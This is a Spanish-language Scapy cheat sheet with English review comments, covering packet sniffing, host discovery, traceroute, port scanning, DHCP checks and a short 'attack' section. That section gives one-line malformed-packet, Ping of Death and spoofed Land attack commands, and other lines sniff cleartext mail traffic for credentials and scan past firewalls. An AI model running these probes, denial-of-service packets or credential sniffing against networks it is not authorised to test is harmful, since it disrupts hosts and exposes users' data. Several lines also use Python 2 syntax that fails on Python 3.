Scapy utilidades basicas

Conjunto de paltitas utiles posibles en scapy.

 

Sniffing:
 
	Snifear en interfaz eth0:
			# Capture on eth0 and print a one-line summary per packet. No count or
			# timeout is passed, so the capture runs until it is interrupted.
			# Opening a capture socket normally requires elevated privileges.
			sniff(iface="eth0",prn=lambda x: x.summary())
			# Same capture, but x.show() dumps every layer and field of each packet.
			sniff(iface="eth0",prn=lambda x: x.show())
	Filtrando y con formato: origen -> destino de la capa IP y, si existe, la carga Raw.
			# sprintf conditional blocks: {IP:...} is rendered only when the packet has
			# an IP layer, {Raw:...} only when it carries a Raw payload. No iface is
			# given, so Scapy's default interface is used.
			# Raw.load is whatever crossed the wire, including cleartext credentials:
			# treat both the printed output and the retained `pkts` list as sensitive.
			pkts = sniff(prn=lambda x:x.sprintf("{IP:%IP.src% -> %IP.dst%\n}{Raw:%Raw.load%\n}"))
	identificando puertos
		# The capture filter keeps only TCP traffic on port 25 or 110 (the registered
		# SMTP and POP3 ports). Each line shows src:sport -> dst:dport, the TCP flags
		# and the TCP payload.
		# Both protocols are cleartext unless TLS is negotiated, so the output can
		# contain mail credentials; seeing them here is evidence the service should
		# be moved to its TLS-protected variant.
		a=sniff(filter="tcp and ( port 25 or port 110 )",prn=lambda x: x.sprintf("%IP.src%:%TCP.sport% -> %IP.dst%:%TCP.dport%  %2s,TCP.flags% : %TCP.payload%"))
 
Ping:
	# Sends a default TCP() probe in a loop to each address of the /30 network
	# that www.google.com resolves into, printing the replies of every round.
	# No count is given, so the loop runs until it is interrupted.
	srloop(IP(dst="www.google.com/30")/TCP())
	//con ICMP bloqueado: ping TCP (SYN al puerto 80)
	# TCP SYN to port 80 of every address matching 192.168.1.*; a live host
	# normally answers (SYN/ACK or RST) even when ICMP echo is filtered.
	# NOTE(review): no timeout= is passed, so sr() may keep waiting for hosts
	# that never answer — confirm and add one if needed.
	ans,unans=sr( IP(dst="192.168.1.*")/TCP(dport=80,flags="S") )
	# Prints the source address of each reply (r is the answer, s the probe).
	# NOTE(review): `lambda(s,r)` is Python 2 tuple-parameter syntax and is a
	# SyntaxError on Python 3; current Scapy documentation writes this callback
	# as `lambda s,r:` — confirm against the installed Scapy version.
	ans.summary( lambda(s,r) : r.sprintf("%IP.src% conteasta") )
 
	//Udp Ping
	# UDP probe to port 0 of 192.168.1.1 through 192.168.1.10. Port 0 is chosen
	# because it is almost certainly closed: a live host is expected to reply
	# with an ICMP port-unreachable error, which is what reveals it.
	# Hosts or firewalls that rate-limit or drop ICMP errors will look silent.
	ans,unans=sr( IP(dst="192.168.1.1-10")/UDP(dport=0) )
	# Prints the source address of each reply.
	# NOTE(review): `lambda(s,r)` is Python 2 only (SyntaxError on Python 3);
	# current Scapy documentation uses `lambda s,r:` — confirm for your version.
	ans.summary( lambda(s,r) : r.sprintf("%IP.src% contesta en udp") )
 
Arping:
	# Layer-2 broadcast of an ARP who-has for every address in 192.168.1.0/24,
	# waiting up to 2 seconds for replies.
	ans,unans=srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.1.0/24"),timeout=2)
	# Prints the MAC and IP address each responder claims. ARP replies are not
	# authenticated, so two different MACs answering for one IP (or one MAC for
	# many IPs) is worth investigating as possible ARP spoofing.
	# NOTE(review): `lambda (s,r)` is Python 2 only (SyntaxError on Python 3);
	# current Scapy documentation uses `lambda s,r:` — confirm for your version.
	ans.summary(lambda (s,r): r.sprintf("%Ether.src% %ARP.psrc%") )
 
	//normal
	# Scapy's built-in helper: performs the ARP ping for the given address and
	# prints the responders, replacing the hand-built srp() call.
	arping("192.168.1.1")
 
Traceroute:
	# TCP traceroute towards four hosts at once, probing TTLs up to 20.
	traceroute(["www.google.com","www.ust.cl","www.terra.cl","www.microsoft.com"],maxttl=20)
	# `_` is the interactive interpreter's "last result" variable, so this line
	# only works when typed immediately after the traceroute() call in a REPL.
	# In a script, assign the return value of traceroute() directly instead.
	result, unans=_
	# Prints the table of hops per destination.
	result.show()
	//graficar
	# Renders the hop graph as PostScript and pipes it to the `lp` print command.
	# NOTE(review): a target starting with "|" is executed as a command, so it
	# must never be built from untrusted input — confirm for your Scapy version.
	# graph() presumably requires Graphviz to be installed; verify locally.
	result.graph(type="ps", target="|lp")
	# Writes the same graph to the file grafico.svg in the current directory.
	result.graph(target="> grafico.svg")
 
Traceroute avanzado:
	//saltándose cortafuegos, por el puerto de DNS
	# Ten TCP SYN probes to port 53 of terra.cl, one per TTL from 1 to 10.
	# Each router where the TTL expires is expected to answer with an ICMP
	# error; the destination itself answers with TCP.
	# Defender's view: a filter that admits port 53 by port number alone lets
	# these probes through. A burst of SYNs to TCP/53 with stepping TTLs from
	# one source is a recognisable path-mapping pattern.
	ans,unans=sr(IP(dst="terra.cl",ttl=(1,10))/TCP(dport=53,flags="S"))
	# Per reply: source address, then the ICMP type if the reply is ICMP, then
	# the TCP flags if the reply is TCP.
	# NOTE(review): `lambda(s,r)` is Python 2 only (SyntaxError on Python 3);
	# current Scapy documentation uses `lambda s,r:` — confirm for your version.
	ans.summary( lambda(s,r) : r.sprintf("%IP.src%\t{ICMP:%ICMP.type%}\t{TCP:%TCP.flags%}"))
 
Graficar tracert:
	# Traceroute to two hosts on both port 80 and port 443, TTLs up to 20.
	# NOTE(review): a negative retry presumably means "resend unanswered probes
	# until that many consecutive rounds bring no new answers" — confirm in the
	# Scapy documentation for sr().
	res,unans = traceroute(["www.ust.cl","www.santotomas.cl"],dport=[80,443],maxttl=20,retry=-2)
	//graficar
	# PostScript rendering piped to the `lp` print command.
	# NOTE(review): a target starting with "|" is executed as a command, so it
	# must never be built from untrusted input — confirm for your Scapy version.
	res.graph(type="ps", target="|lp")
	# Same graph written to grafico.svg in the current directory.
	res.graph(target="> grafico.svg")
 
scanner de puertos:
	# One TCP SYN per port for ports 1 through 1024 of the host named "target"
	# (a placeholder to replace). That is 1024 probes from a single source in
	# one burst, which is exactly the pattern SYN-scan detection rules look for.
	# NOTE(review): no timeout= is passed; filtered ports never answer, so sr()
	# may wait until interrupted — confirm and add one if needed.
	res,unans = sr( IP(dst="target")/TCP(flags="S", dport=(1,1024)) )
	//visualizando.
	# Keeps only replies that have a TCP layer with the SYN bit set (flags & 2),
	# i.e. the SYN/ACK answers that indicate an open port; RST replies from
	# closed ports are filtered out of the listing.
	# NOTE(review): `lambda (s,r)` is Python 2 only (SyntaxError on Python 3);
	# current Scapy documentation uses `lambda s,r:` — confirm for your version.
	res.nsummary( lfilter=lambda (s,r): (r.haslayer(TCP) and (r.getlayer(TCP).flags & 2)) )
 
OS fingerprint:
	# Repeated TCP SYN to port 80 of 192.168.1.1, collecting the replies in ans.
	# NOTE(review): this line only gathers responses. The comparison step that
	# would turn them into a fingerprint (presumably the progression of the
	# initial sequence numbers in the replies) is not shown on this page.
	ans,unans=srloop(IP(dst="192.168.1.1")/TCP(dport=80,flags="S"))
 
un ataquecillo:
	paquete mal formado:
		# One ICMP packet whose IP header declares version=3 and ihl=2. IPv4
		# requires version 4 and a header length of at least 5 words, so a stack
		# that validates the header discards this packet. On the wire, such
		# header values are a clear anomaly for an IDS to flag.
		send(IP(dst="192.168.1.1", ihl=2, version=3)/ICMP())
	Ping of death:
		# An ICMP packet with a 60000-byte payload, split by fragment() and sent
		# as a series of IP fragments. The name refers to a historic reassembly
		# bug; NOTE(review): current stacks are expected to bound reassembly, so
		# this mainly exercises fragment handling in the host and in any
		# IDS/firewall on the path — confirm behaviour on the systems in scope.
		send( fragment(IP(dst="192.168.1.1")/ICMP()/("X"*60000)) )
	Land attack (windows):
		# A TCP packet whose source and destination address are both `target`,
		# with source and destination port both 135. `target` is a variable here
		# and must already be defined in the session.
		# Mitigation: anti-spoofing (ingress) filtering that drops inbound
		# packets claiming a local source address blocks this pattern, and
		# patched stacks ignore it.
		send(IP(src=target,dst=target)/TCP(sport=135,dport=135))
 
verificando DHCP de la red:
	# The discover is sent to 255.255.255.255 but offers come back from each
	# server's own address. Disabling the source-IP check lets Scapy match those
	# replies to the probe.
	conf.checkIPaddr = False
	# Raw hardware (MAC) address of the default interface, used as the BOOTP
	# client address below.
	fam,hw = get_if_raw_hwaddr(conf.iface)
	# Standard DHCP DISCOVER: layer-2 broadcast, 0.0.0.0 -> 255.255.255.255,
	# UDP 68 -> 67.
	dhcp_discover = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=hw)/DHCP(options=[("message-type","discover"),"end"])
	# multi=True keeps accepting answers after the first one, so every DHCP
	# server on the segment is recorded. More responders than the servers you
	# operate points to a rogue DHCP server.
	# NOTE(review): no timeout= is passed; srp() presumably waits until it is
	# interrupted — confirm.
	ans, unans = srp(dhcp_discover, multi=True)
	//mostrando
	# Lists the collected (discover, offer) pairs. Compare the responding server
	# MAC/IP addresses against the DHCP servers that are supposed to exist on
	# this network.
	ans.display()